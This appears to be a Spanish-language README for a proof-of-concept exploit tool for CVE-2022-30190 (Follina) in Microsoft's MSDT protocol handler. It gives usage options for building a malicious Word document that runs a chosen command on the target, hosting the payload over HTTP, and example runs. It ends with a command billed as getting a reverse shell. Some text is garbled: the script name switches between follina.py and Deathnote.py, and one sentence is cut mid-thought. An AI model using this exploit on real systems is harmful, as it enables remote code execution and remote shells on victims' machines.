
Prueba de concepto de CVE-2022-30190
Existe una vulnerabilidad de ejecución remota de código cuando se llama a MSDT mediante el protocolo URL desde una aplicación que lo invoca, como Word. Un atacante que explote esta vulnerabilidad con éxito puede ejecutar código arbitrario con los privilegios de la aplicación que lo invoca. El atacante puede entonces instalar programas, ver, cambiar o eliminar datos, o crear cuentas nuevas en el contexto permitido por los derechos del usuario.
Crea un ataque MS-MSDT "Deathnote" con un documento malicioso de Microsoft Word y aloja un payload con un servidor HTTP.
usage: follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]
options:
-h, --help show this help message and exit
--command COMMAND, -c COMMAND
command to run on the target (default: Notepad)
--output OUTPUT, -o OUTPUT
output maldoc file (default: ./Deathnote.doc)
--interface INTERFACE, -i INTERFACE
network interface or IP address to host the HTTP server (default: eth0)
--port PORT, -p PORT port to serve the HTTP server (default: 8000)
Lanzar notepad.exe:
$ python3 Deathnote.py
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./Deathnote.doc
[+] serving html payload on :8000
Lanzar calc.exe:
$ python3 Deathnote.py -c "calc"

C:\Windows\Tasks. No elimina el binario. Esto provocará detecciones del antivirus a menos que el antivirus esté deshabilitado.Consigue reverse shell :
python3 Deathnote.py -p 1234